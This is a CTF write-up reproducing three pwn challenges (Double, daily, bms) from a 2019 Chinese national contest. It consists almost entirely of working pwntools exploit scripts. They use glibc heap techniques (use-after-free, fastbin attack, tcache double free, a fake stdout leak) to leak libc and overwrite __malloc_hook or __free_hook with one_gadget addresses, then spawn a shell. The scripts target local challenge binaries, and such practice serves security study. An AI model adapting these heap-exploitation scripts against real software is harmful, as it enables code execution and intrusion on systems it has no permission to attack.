2019国赛初赛pwn复现

Double

got可写,无pie

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: n0trix -*-

from pwn import *

context.terminal = ['tmux','splitw','-v']
context.log_level = 'debug'

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
elf = ELF('./pwn',checksec=False)
one = [0x45226,0x4527a,0xf0364,0xf1207]

io = process('./pwn')

def add(con):
    io.sendlineafter('> ','1')
    io.recvline()
    io.sendline(con)

def show(idx):
    io.sendlineafter('> ','2')
    io.sendlineafter('index: ',str(idx))

def edit(idx,con):
    io.sendlineafter('> ','3')
    io.sendlineafter('index: ',str(idx))
    sleep(0.1)
    io.sendline(con)

def dele(idx):
    io.sendlineafter('> ','4')
    io.sendlineafter('index: ',str(idx))

'''
info structure
{
    index int;
    size  int;
    content *chunk_ptr;
    next_info *info;
}
edit功能不检查index
'''

fake_chunk = 0x4040bd

add(0x80*'A') #0
add(0x80*'A') #1
dele(0)
show(1)

libc_base = u64(io.recvuntil('\x7f').ljust(8,'\x00'))-3951480
log.success('libc:'+hex(libc_base))
#free_hook = libc_base + libc.sym['__free_hook']
malloc_hook = libc_base + libc.sym['__malloc_hook']
#clear unsortedbin

add(0x80*'a') #2

add(0x10*'*') #3
#use 4 and 5 UAF
add(0x60*'B') #4
add(0x60*'B') #5
dele(4)
edit(5,p64(malloc_hook-0x23))

add(0x60*'C') #6

#use edit to alloc malloc hook
payload = 0x13*'\x00'+p64(libc_base+one[3])
payload = payload.ljust(0x60,'\x00')
edit(3,payload)

io.sendlineafter('> ','1')
io.recvline()
io.sendline('A')
io.interactive()

daily

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: n0trix -*-

from pwn import *

context.terminal = ['tmux','splitw','-v']
context.log_level = 'debug'

elf = ELF('./pwn',checksec=False)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
one = [0x45226,0x4527a,0xf0364,0xf1207]
io = process('./pwn')

def add(size,con):
    io.sendlineafter('choice:','2')
    io.sendlineafter('daily:',str(size))
    io.recvline()
    io.send(con)

def edit(idx,con):
    io.sendlineafter('choice:','3')
    io.sendlineafter('daily:',str(idx))
    io.recvline()
    io.send(con)

def dele(idx):
    io.sendlineafter('choice:','4')
    io.sendlineafter('daily:',str(idx))

def show():
    io.sendlineafter('choice:','1')

#leak libc
add(0x88,'aaaa')
add(0x10,'aaaa')
dele(0)
add(0x88,'a'*8)
show()
libc_base = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-3951480
log.success('libc: '+hex(libc_base))
malloc_hook = libc_base + libc.sym['__malloc_hook']

#leak heap addr
add(0x68,'aaaa') #2
add(0x68,'aaaa') #3
dele(2)
dele(3)
#gdb.attach(io)
add(0x68,'\x90') #2
show()
io.recvuntil('2 : ')
heap = u64(io.recvuntil('=',drop=True).ljust(8,'\x00'))+0x100
log.success('heap: '+hex(heap))

#create a fake node and a fake fastchunk in a real chunk
#use idx to free the fake chunk,then fastbin attack
list_addr = 0x602060 #step = 0x10
idx = (heap+0x10-list_addr)/0x10
add(0x80,p64(0x68)+p64(heap+0x30)+p64(0)+p64(0x71)) #3

#fastbin attack
dele(idx)
edit(3,p64(0x68)+p64(heap+0x30)+p64(0)+p64(0x71)+p64(malloc_hook-0x23))
add(0x68,'junk')
#gdb.attach(io)
#write malloc_hook
add(0x68,11*'\x00'+p64(libc_base+one[1])+p64(libc_base+libc.sym['realloc']))
io.sendlineafter('choice:','2')
io.sendlineafter('daily:','1')
io.interactive()

bms

glibc2.26: tcache_dup

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: n0trix -*-

from pwn import *

context.log_level = 'debug'

elf  = ELF('./pwn')
libc = ELF('/mnt/hgfs/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
ld   = ELF('/mnt/hgfs/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ld-2.27.so')
io   = process(argv=[ld.path,elf.path],env={'LD_PRELOAD' : libc.path})
one  = [0x4f2c5,0x4f322,0x10a38c]
stdout = 0x602020

def login():
    io.sendlineafter('username:','admin')
    io.sendlineafter('password:','frame')

def add(name,size,con,ch=1):
    if ch == 1:
        io.sendlineafter('>\n','1')
    else:
        io.sendlineafter('>','1')
    io.sendafter('name:',name)
    io.sendlineafter('size:',str(size))
    io.sendafter('tion:',con)

def dele(idx,ch=1):
    if ch == 1:
        io.sendlineafter('>\n','2')
    else:
        io.sendlineafter('>','2')
    io.sendlineafter('index:',str(idx))
    
login()
add('0',0x60,'aaaa')

dele(0)
dele(0)

add('1',0x60,p64(stdout))
add('2',0x60,'aaaa')
add('3',0x60,'\x60')

fake_stdout = p64(0xfbad1800)+p64(0)*3+p8(8)
add('4',0x60,fake_stdout)

libc_base = u64(io.recvn(8))-4118704
free_hook = libc_base + libc.sym['__free_hook']

add('5',0x50,'???',2)
dele(5,2)
dele(5,2)
add('6',0x50,p64(free_hook),2)
add('7',0x50,'aaaa',2)
add('8',0x50,p64(libc_base+one[1]),2)

dele(5,2)
io.interactive()